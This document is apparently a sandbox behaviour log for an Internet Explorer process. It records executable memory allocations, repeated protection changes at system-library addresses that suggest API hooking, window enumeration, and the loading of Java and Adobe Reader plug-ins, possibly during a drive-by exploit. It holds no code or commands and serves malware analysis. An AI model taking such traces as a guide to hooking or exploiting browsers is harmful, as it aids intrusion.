PID Filepath Base Length Protection Completion Count Source Address
1712 C:\Program Files\Internet Explorer\iexplore.exe 8080000 807F8C8 page read and write success or wait 1 801A5EB
1712 C:\Program Files\Internet Explorer\iexplore.exe 8080000 807F8CC page read and write success or wait 1 801A5EB
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190000 807F4C0 page execute and read and write success or wait 1 8023FCB
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771CE9C1 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771CE9C1 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212FC1 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212FC1 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C4D8C 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C4D8C 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C82EA 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C82EA 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9100 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9100 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D89F7 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D89F7 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C79C2 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C79C2 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9C53 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9C53 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D9064 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D9064 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771BB1D8 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771BB1D8 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB3E2B 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB3E2B 1000 page execute read page execute and read and write success or wait 1 801F134
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 4 8028879
User Activities:
+ Window enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address
0 0 false 1CC 3011a, 30114, 1, 100b8, 100b6, 1, 64415c73, 696e696d, 61727473, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 1 6C35FF6D
0 0 false 1CC 3011a, 30114, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 1 21F180
0 0 false 4FC 5029c, 801d6, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 4 8019AFD
0 0 false 4FC 5029c, 1, 530049, 520054, 5c0059, 530055, 520045, 53005c, 31002d, 35002d, 32002d, 2d0031, 300035, 390037, 310032 success or wait 1 8019AFD
0 0 false 6C8 50122, 400c0, 30132, 30130, 30166, 60176, 30116, 400e0, 5013a, 40134, 60104, 30146, 50102, 700f8, 900fe success or wait 2 8019D36
0 0 false 1CC 3011a, 30114, 1, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1 success or wait 3 27B3130
0 0 false 6C8 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 6 1AF2810
0 0 false 6C8 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2 F43F38
0 0 false 6C8 40134, 30146, 90112, 60108, 1, 1, 1, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 4 402372
+ Chronological sections
Operation Data Completion Time
Section loaded Path: C:\WINDOWS\system32\jscript.dll Access: write and read and execute Type: commit Baseaddress: 2340000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 2421972386
Section loaded Path: C:\WINDOWS\system32\jscript.dll Access: query and write and read and execute Type: image Baseaddress: 75C50000 Size: 512000 Protection: read write Mapped to pid: own pid success or wait 2421976963
Section loaded Path: C:\WINDOWS\system32\mshtml.tlb Access: query and read Type: commit Baseaddress: 3A60000 Size: 1351680 Protection: readonly Mapped to pid: own pid success or wait 2491329874
Section loaded Path: C:\WINDOWS\system32\msxml3.dll Access: write and read and execute Type: commit Baseaddress: 3BB0000 Size: 1175552 Protection: execute Mapped to pid: own pid success or wait 2491383507
Section loaded Path: C:\WINDOWS\system32\msxml3.dll Access: query and write and read and execute Type: image Baseaddress: 74980000 Size: 1191936 Protection: read write Mapped to pid: own pid success or wait 2491395358
Section loaded Path: C:\WINDOWS\system32\msxml3r.dll Access: write and read and execute Type: commit Baseaddress: 4080000 Size: 45056 Protection: execute Mapped to pid: own pid success or wait 2491503559
Section loaded Path: C:\WINDOWS\system32\msxml3r.dll Access: query and read Type: commit Baseaddress: 4080000 Size: 45056 Protection: readonly Mapped to pid: own pid success or wait 2491506195
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\JavaWebStart.dll Access: write and read and execute Type: commit Baseaddress: 4090000 Size: 139264 Protection: execute Mapped to pid: own pid success or wait 2491573133
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\JavaWebStart.dll Access: query and write and read and execute Type: image Baseaddress: 6D320000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2491608794
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\NPJPI150_01.dll Access: write and read and execute Type: commit Baseaddress: 41A0000 Size: 73728 Protection: execute Mapped to pid: own pid success or wait 2491656752
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\NPJPI150_01.dll Access: query and write and read and execute Type: image Baseaddress: 6D590000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2491739344
Section loaded Path: \KnownDlls\OLEPRO32.DLL Access: write and read and execute Type: unknown Baseaddress: 6D590000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2491745969
Section loaded Path: C:\WINDOWS\system32\olepro32.dll Access: query and write and read and execute Type: image Baseaddress: 5EDD0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2491748682
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpiexp32.dll Access: write and read and execute Type: commit Baseaddress: 41A0000 Size: 98304 Protection: execute Mapped to pid: own pid success or wait 2491790015
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpiexp32.dll Access: query and write and read and execute Type: image Baseaddress: 6D400000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2491822499
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 41A0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2491851860
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2491858003
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpishare.dll Access: write and read and execute Type: commit Baseaddress: 41B0000 Size: 81920 Protection: execute Mapped to pid: own pid success or wait 2491891664
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpishare.dll Access: query and write and read and execute Type: image Baseaddress: 6D450000 Size: 98304 Protection: read write Mapped to pid: own pid success or wait 2491908867
Section loaded Path: \KnownDlls\shfolder.dll Access: write and read and execute Type: unknown Baseaddress: 6D450000 Size: 98304 Protection: read write Mapped to pid: own pid object name not found 2491943189
Section loaded Path: C:\WINDOWS\system32\shfolder.dll Access: query and write and read and execute Type: image Baseaddress: 76780000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2491946184
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\jvm.dll Access: write and read and execute Type: commit Baseaddress: 41B0000 Size: 1527808 Protection: execute Mapped to pid: own pid success or wait 2492034484
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\jvm.dll Access: query and write and read and execute Type: image Baseaddress: 6D640000 Size: 1593344 Protection: read write Mapped to pid: own pid success or wait 2492056663
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\hpi.dll Access: write and read and execute Type: commit Baseaddress: 41C0000 Size: 36864 Protection: execute Mapped to pid: own pid success or wait 2492402369
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\hpi.dll Access: query and write and read and execute Type: image Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2492418460
Section loaded Path: \BaseNamedObjects\hsperfdata_Administrator_1712 Access: query and write and read Type: commit Baseaddress: 41C0000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 2492460529
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\verify.dll Access: write and read and execute Type: commit Baseaddress: 41D0000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2492481927
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\verify.dll Access: query and write and read and execute Type: image Baseaddress: 6D610000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 2492512264
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\java.dll Access: write and read and execute Type: commit Baseaddress: 41D0000 Size: 122880 Protection: execute Mapped to pid: own pid success or wait 2492531479
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\java.dll Access: query and write and read and execute Type: image Baseaddress: 6D300000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2492569901
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\zip.dll Access: write and read and execute Type: commit Baseaddress: 41D0000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2492604747
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\zip.dll Access: query and write and read and execute Type: image Baseaddress: 6D630000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 2492645849
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 2AA80000 Size: 5308416 Protection: readonly Mapped to pid: own pid success or wait 2496693465
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 2B280000 Size: 5832704 Protection: write copy Mapped to pid: own pid success or wait 2496700857
Section loaded Path: C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 2BE80000 Size: 851968 Protection: write copy Mapped to pid: own pid success or wait 2496705953
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\zip.dll Access: write and read and execute Type: commit Baseaddress: 6A30000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2497638421
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\awt.dll Access: write and read and execute Type: commit Baseaddress: 6E30000 Size: 1331200 Protection: execute Mapped to pid: own pid success or wait 2498550986
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\awt.dll Access: query and write and read and execute Type: image Baseaddress: 6D000000 Size: 1466368 Protection: read write Mapped to pid: own pid success or wait 2498595200
Section loaded Path: \KnownDlls\ddraw.dll Access: write and read and execute Type: unknown Baseaddress: 6D000000 Size: 1466368 Protection: read write Mapped to pid: own pid object name not found 2500295299
Section loaded Path: C:\WINDOWS\system32\ddraw.dll Access: query and write and read and execute Type: image Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid success or wait 2500298523
Section loaded Path: \KnownDlls\DCIMAN32.dll Access: write and read and execute Type: unknown Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid object name not found 2500365856
Section loaded Path: C:\WINDOWS\system32\dciman32.dll Access: query and write and read and execute Type: image Baseaddress: 73BC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2500369291
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\fontmanager.dll Access: write and read and execute Type: commit Baseaddress: 6E30000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 2500554953
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\fontmanager.dll Access: query and write and read and execute Type: image Baseaddress: 6D240000 Size: 249856 Protection: read write Mapped to pid: own pid success or wait 2500561202
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\deploy.dll Access: write and read and execute Type: commit Baseaddress: 7130000 Size: 69632 Protection: execute Mapped to pid: own pid success or wait 2501044530
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\deploy.dll Access: query and write and read and execute Type: image Baseaddress: 6D1F0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2501083475
Section loaded Path: \KnownDlls\shfolder.dll Access: write and read and execute Type: unknown Baseaddress: 6D1F0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2501154221
Section loaded Path: C:\WINDOWS\system32\shfolder.dll Access: query and write and read and execute Type: image Baseaddress: 76780000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2501157168
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\RegUtils.dll Access: write and read and execute Type: commit Baseaddress: 7340000 Size: 122880 Protection: execute Mapped to pid: own pid success or wait 2502676229
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\RegUtils.dll Access: query and write and read and execute Type: image Baseaddress: 6D5D0000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2502714856
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpicom32.dll Access: write and read and execute Type: commit Baseaddress: 7440000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 2503519720
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\jpicom32.dll Access: query and write and read and execute Type: image Baseaddress: 6D3E0000 Size: 81920 Protection: read write Mapped to pid: own pid success or wait 2503563078
Section loaded Path: C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll Access: write and read and execute Type: commit Baseaddress: 6F30000 Size: 634880 Protection: execute Mapped to pid: own pid success or wait 2504906065
Section loaded Path: C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll Access: query and write and read and execute Type: image Baseaddress: 6F30000 Size: 626688 Protection: read write Mapped to pid: own pid conflicting addresses 2504946865
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll Access: query and write and read and execute Type: image Baseaddress: 7C420000 Size: 552960 Protection: read write Mapped to pid: own pid success or wait 2505371287
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2505557585
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7830000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505591180
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2505603053
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7830000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505605216
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 7830000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505608412
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 7830000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2505610409
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: write and read and execute Type: commit Baseaddress: 7960000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2505660478
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7960000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505663018
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: write and read and execute Type: commit Baseaddress: 7960000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2505667298
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7960000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505669860
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Access: query and read Type: commit Baseaddress: 7830000 Size: 344064 Protection: readonly Mapped to pid: own pid success or wait 2505703100
Section loaded Path: C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll Access: query and read Type: commit Baseaddress: 6FF0000 Size: 49152 Protection: readonly Mapped to pid: own pid success or wait 2517476820
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 356352 Protection: execute Mapped to pid: own pid success or wait 2517487796
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api Access: query and read Type: commit Baseaddress: 7830000 Size: 356352 Protection: readonly Mapped to pid: own pid success or wait 2517492994
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 356352 Protection: execute Mapped to pid: own pid success or wait 2517520991
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api Access: query and read Type: commit Baseaddress: 7830000 Size: 356352 Protection: readonly Mapped to pid: own pid success or wait 2517524490
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 8658944 Protection: execute Mapped to pid: own pid success or wait 2517529635
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api Access: query and read Type: commit Baseaddress: 7830000 Size: 8658944 Protection: readonly Mapped to pid: own pid success or wait 2517534772
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 8658944 Protection: execute Mapped to pid: own pid success or wait 2517660172
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api Access: query and read Type: commit Baseaddress: 7830000 Size: 8658944 Protection: readonly Mapped to pid: own pid success or wait 2517664357
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 4124672 Protection: execute Mapped to pid: own pid success or wait 2517687196
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api Access: query and read Type: commit Baseaddress: 7830000 Size: 4124672 Protection: readonly Mapped to pid: own pid success or wait 2517692149
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 4124672 Protection: execute Mapped to pid: own pid success or wait 2517753059
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api Access: query and read Type: commit Baseaddress: 7830000 Size: 4124672 Protection: readonly Mapped to pid: own pid success or wait 2517756586
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 839680 Protection: execute Mapped to pid: own pid success or wait 2517768030
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api Access: query and read Type: commit Baseaddress: 7830000 Size: 839680 Protection: readonly Mapped to pid: own pid success or wait 2517775337
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 839680 Protection: execute Mapped to pid: own pid success or wait 2517785382
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api Access: query and read Type: commit Baseaddress: 7830000 Size: 839680 Protection: readonly Mapped to pid: own pid success or wait 2517788886
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1150976 Protection: execute Mapped to pid: own pid success or wait 2517794412
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1150976 Protection: readonly Mapped to pid: own pid success or wait 2517799054
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1150976 Protection: execute Mapped to pid: own pid success or wait 2517811058
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1150976 Protection: readonly Mapped to pid: own pid success or wait 2517814135
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2517821628
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2517826515
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2517832170
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2517835611
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2517839696
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api Access: query and read Type: commit Baseaddress: 7000000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 2517844813
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2517850121
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api Access: query and read Type: commit Baseaddress: 7000000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 2517853571
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1417216 Protection: execute Mapped to pid: own pid success or wait 2517857479
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1417216 Protection: readonly Mapped to pid: own pid success or wait 2517862372
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1417216 Protection: execute Mapped to pid: own pid success or wait 2517875594
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1417216 Protection: readonly Mapped to pid: own pid success or wait 2517879451
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2517886367
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2517890935
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2517896428
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2517899973
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2517903973
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api Access: query and read Type: commit Baseaddress: 7000000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 2517908616
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2517914381
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api Access: query and read Type: commit Baseaddress: 7000000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 2517917834
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 2517921681
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api Access: query and read Type: commit Baseaddress: 7000000 Size: 86016 Protection: readonly Mapped to pid: own pid success or wait 2517926486
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 2517932373
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api Access: query and read Type: commit Baseaddress: 7000000 Size: 86016 Protection: readonly Mapped to pid: own pid success or wait 2517936231
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 471040 Protection: execute Mapped to pid: own pid success or wait 2517940290
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API Access: query and read Type: commit Baseaddress: 7830000 Size: 471040 Protection: readonly Mapped to pid: own pid success or wait 2517945212
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 471040 Protection: execute Mapped to pid: own pid success or wait 2517952599
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API Access: query and read Type: commit Baseaddress: 7830000 Size: 471040 Protection: readonly Mapped to pid: own pid success or wait 2517956112
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 2035712 Protection: execute Mapped to pid: own pid success or wait 2517960942
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api Access: query and read Type: commit Baseaddress: 7830000 Size: 2035712 Protection: readonly Mapped to pid: own pid success or wait 2517965857
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 2035712 Protection: execute Mapped to pid: own pid success or wait 2517981480
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api Access: query and read Type: commit Baseaddress: 7830000 Size: 2035712 Protection: readonly Mapped to pid: own pid success or wait 2517985415
